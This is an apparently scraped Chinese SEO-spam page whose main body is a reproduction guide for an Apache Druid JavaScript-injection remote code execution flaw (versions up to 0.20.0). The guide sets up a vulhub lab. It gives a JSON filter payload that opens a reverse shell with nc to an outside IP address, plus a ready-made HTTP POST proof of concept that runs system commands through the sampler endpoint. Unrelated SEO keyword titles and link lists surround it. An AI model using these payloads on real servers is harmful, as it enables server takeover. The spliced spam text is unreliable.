当前位置: 首页 > news >正文

h5企业模板网站搜索引擎营销优化的方法

h5企业模板网站,搜索引擎营销优化的方法,wordpress图像大小设置,手机网站制作教程html5+css3视频教程大全漏洞详情: Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境…

漏洞详情:

Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境,且默认情况下已禁用。但是,在Druid 0.20.0及更早版本中,经过身份验证用户可以构造传入json串来控制某些参数发送恶意的请求,强制Druid为该请求运行用户提供的JavaScript代码。由于Apache Druid默认情况下缺乏授权认证,攻击者可以利用此漏洞在目标机器上执行任意代码,最终可获取服务器的控制权限。该漏洞源于攻击者可利用恶意JSON输入,通过function参数控制Rhino引擎执行的JavaScript代码,进而调用系统命令

影响范围:

Apache Druid <= 0.20.0

漏洞复现:

pull影响范围内的druid版本镜像

docker pull vulhub/apache-druid:0.20.0

运行容器

docker run --rm -i -p 8888:8888 vulhub/docker-druid:0.20.0

开浏览器访问8888端口 ,无需认证可访问Druid console页面:

上传代码块

 Base directory==》quickstart/tutorial 

File filter==》 wikiticker-2015-09-12-sampled.json.gz

在下面这步开始抓包

 

在这里插入⬇️⬇️⬇️ function代码块

, "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 121.43.48.229 9999 -e /bin/sh')}", "": {"enabled": true}}

上传执行指令

反连shell成功🏅

 

也有现成的poc
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}
验证结果 
http://www.hengruixuexiao.com/news/48040.html

相关文章:

  • 宁波网站制作网站互联网公司网站模板
  • 摄影网站appseo排名优化推广教程
  • wordpress实现专题武汉seo学徒
  • 网站建设法律可行性河源seo
  • 邯郸企业网站建设报价武汉seo推广优化
  • 做创意ppt网站有哪些方面搜狗搜索引擎优化指南
  • wordpress 视频 播放器惠州百度seo在哪
  • 厦门网站建设webseo9福州seo推广外包
  • 做网站为什么要域名 解析绑定最新的疫情数据
  • 免费建设网站的方法常德seo
  • 做淘宝客淘宝网站被黑seo怎么做最佳
  • 那里可以免费做网站大连最好的做网站的公司
  • 企业网站开发实训过程与内容直播回放老卡怎么回事
  • 邢台网站建设免费做网站排名阿里巴巴seo排名优化
  • php网站开发背景百度有效点击软件
  • 客户都不愿意做网站seo是什么意思呢
  • 推荐几个响应式网站做参考关键词排名客服
  • 网站的管理权限有什么用常见的网络营销方法有哪些
  • wordpress3.9.1下载太原seo快速排名
  • 个人旅游网站模板友情链接平台赚钱吗
  • 织梦可以做家教网站吗市场调研公司
  • 双城网站建设哪家好河南最新消息
  • 2022最新新闻长沙靠谱seo优化价格
  • 兴义网站seo键词优化排名
  • 网站备案需要建设好网站吗百度竞价渠道户
  • 网站页面做专题的步骤优化防控举措
  • 用什么语言做网站网站建设首页
  • ps做简洁大气网站百度快照收录
  • 专门做游戏交易的网站2022十大热点事件及评析
  • 成都网站建设四川冠辰买链接官网